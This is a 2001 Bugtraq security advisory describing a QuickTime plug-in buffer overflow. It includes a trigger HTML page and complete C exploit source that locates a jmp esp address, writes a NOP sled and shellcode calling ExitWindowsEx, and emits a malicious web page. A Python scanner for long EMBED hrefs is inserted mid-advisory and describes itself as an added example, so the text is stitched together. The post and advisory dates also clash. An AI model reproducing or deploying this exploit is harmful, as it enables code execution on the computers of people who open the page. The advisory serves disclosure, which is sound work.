Bugtraq mailing list archives

[SPSadvisory#41]Apple Quick Time Plug-in Buffer Overflow


From: UNYUN <shadowpenguin () BACKSECTION NET>
Date: Wed, 31 Jan 2001 22:25:25 +0900

SPS Advisory #41

Apple Quick Time Plug-in Buffer Overflow

UNYUN <shadowpenguin () backsection net>
Shadow Penguin Security (http://shadowpenguin.backsection.net)

--------------------------------------------------------------

[Date]
July 31, 2001

[Vulnerable]
QuickTime Player 4.1.2 for Windows (Japanese)

[Not vulnerable]
unknown

[Overview]
   There is an exploitable buffer overflow bug in the QuickTime plug-in
for Windows. The problem is triggered when the visitor clicks the movie
shown in the browser. The QuickTime plug-in does not check the length of
the HREF parameter of the EMBED tag appropriately, so QuickTime overflows
when a long string is specified in HREF. The overflow overwrites a local
buffer, and code written in the EMBED tag can be executed on the client
host.

[Risk]
   If an HTML file whose EMBED tag contains the cracking code is opened
and the visitor clicks the shown movie, the cracking code is executed on
the client host. This overflow opens the possibility of virus and trojan
infection, system destruction, intrusion, and so on.

[Details]
   We explain the details of this problem under the environment of
Windows 98 (SE/Japanese) + QuickTime Player 4.1.2 for Windows + Internet
Explorer 5.0. You can check this problem easily with the following
simple HTML file.

<html>
<embed src="c:\program files\quicktime\sample.mov"
       href="aaaa... long string (730 characters)"
       width=60 height=60 autoplay="true"
       target="QUICKTIMEPLAYER">
</html>

* You must prepare a sample movie file to specify in the "src" parameter.
* Write a 730-byte string in the "href" parameter.

Internet Explorer will crash from the buffer overflow when the movie
shown in the browser is clicked. You will be able to see that EIP is
0x61616161 in the GPF dialog box when Internet Explorer crashes.
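From the defender's side, the useful check is whether a page carries an EMBED tag whose href is anywhere near the length the advisory describes. The scanner below is an added example, not part of the original advisory or of any Shadow Penguin Security code; the 512-character flag limit, the SAMPLE_HTML page and the scan_bytes helper are this example's own assumptions.

```python
from html.parser import HTMLParser

# The advisory triggers the crash with a 730-character HREF. The flag limit
# below is this example's own choice, set well under that to give a margin.
HREF_LIMIT = 512

class EmbedHrefScanner(HTMLParser):
    """Record every <embed> whose href attribute exceeds the limit."""

    def __init__(self, limit=HREF_LIMIT):
        super().__init__()
        self.limit = limit
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # handle_startendtag defers here too, so <embed ... /> is covered
        if tag.lower() != "embed":
            return
        for name, value in attrs:
            if name.lower() != "href" or value is None:
                continue
            if len(value) > self.limit:
                self.findings.append({
                    "line": self.getpos()[0],
                    "href_len": len(value),
                    # padding bytes or machine code show up as control chars
                    "non_printable": sum(1 for c in value if not c.isprintable()),
                })

def scan_html(text, limit=HREF_LIMIT):
    scanner = EmbedHrefScanner(limit)
    scanner.feed(text)
    scanner.close()
    return scanner.findings

def scan_bytes(data, limit=HREF_LIMIT):
    # latin-1 maps every byte to one code point, so raw bytes such as 0x90
    # survive decoding instead of raising or being merged by UTF-8 rules
    return scan_html(data.decode("latin-1"), limit)

# Constructed sample: the advisory's trigger page followed by a benign embed.
SAMPLE_HTML = (
    '<html>\n'
    '<embed src="c:\\program files\\quicktime\\sample.mov" href="' + "a" * 730 + '"\n'
    '       width=60 height=60 autoplay="true" target="QUICKTIMEPLAYER">\n'
    '<embed src="intro.mov" href="next.html" width=60 height=60>\n'
    '</html>\n'
)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print("line %d: embed href of %d chars (%d non-printable)"
              % (f["line"], f["href_len"], f["non_printable"]))
```

Run it over saved pages or proxy captures with scan_bytes so that non-text payload bytes are counted rather than lost in decoding.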

[Avoidance]
Disable the execution of ActiveX controls and plug-ins.

[Caution]
   We may change this information without notice. Use of this
information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of or
in connection with the use or spread of this information. Any use of
this information is only for personal experiment.

[Comments ?]
   If you have any comments, please send them to the following address.

UNYUN <shadowpenguin () backsection net>
http://shadowpenguin.backsection.net

[Sample code]
   This sample generates an HTML file that includes code which shuts
down Windows by calling the ExitWindowsEx API. The shutdown code is
written into the EMBED tag and is executed through this buffer overflow
problem. When you check this problem with the following sample code, you
must set an appropriate movie file in MOV_FILE (the movie file
"sample.mov" written in the code below is a sample that is installed by
default with QuickTime Player 4.1.2). This sample code can be compiled
with Visual C++ 6.0. It was checked under the environment of Windows 98
Second Edition (Japanese) + Internet Explorer 5.0.

/*====================================================================
   Apple QuickTime 4.1.2 plug-in exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin () backsection net)
  ====================================================================
*/

#include    <stdio.h>
#include    <stdlib.h>
#include    <string.h>
#include    <windows.h>

#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT      60
#define WIDTH       60
#define TARGET      "QUICKTIMEPLAYER"
#define FILE_IMAGE  \
                    "<html><embed src=\"%s\" href=\"%s\" "\
                    "width=%d height=%d autoplay=\"true\" "\
                    "target=\"%s\"><br></html>"
#define BUFSIZE     730
#define RET         684
#define ESP_TGT     "rpcrt4.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90

unsigned char   exploit_code[200]={
        0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
        0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
        0xFF,0xD0,0x00,
};

int main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[BUFSIZE];
    unsigned int    i,pretadr,p,ip,kp;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
               argv[0]);
        exit(1);
    }

    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
         printf("%s is not found.\n",ESP_TGT);
         exit(1);
    }

    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        if (  ( p     &0xff)==0
           || ((p>>8 )&0xff)==0
           || ((p>>16)&0xff)==0
           || ((p>>24)&0xff)==0) continue;
        if (   *((unsigned char *)p)==JMPESP_1
            && *(((unsigned char *)p)+1)==JMPESP_2)
            pretadr=p;
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("File write error \"%s\"\n",argv[1]);
        exit(1);
    }
    memset(buf,NOP,BUFSIZE);
    memcpy(buf+700-12,exploit_code,strlen((char *)exploit_code));
    buf[BUFSIZE-2]=0;

    ip=pretadr;
    printf("EIP=%x\n",ip);
    buf[RET  ]=ip&0xff;
    buf[RET+1]=(ip>>8)&0xff;
    buf[RET+2]=(ip>>16)&0xff;
    buf[RET+3]=(ip>>24)&0xff;

    if (argc==2)
        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
    else
        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
    fclose(fp);
    printf("Done.\n");
    return 0;
}

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
   shadowpenguin () backsection net (SPS-Official)
   unyun () shadowpenguin org (Personal)
% eEye Digital Security Team [ http://www.eEye.com ]
   unyun () eEye com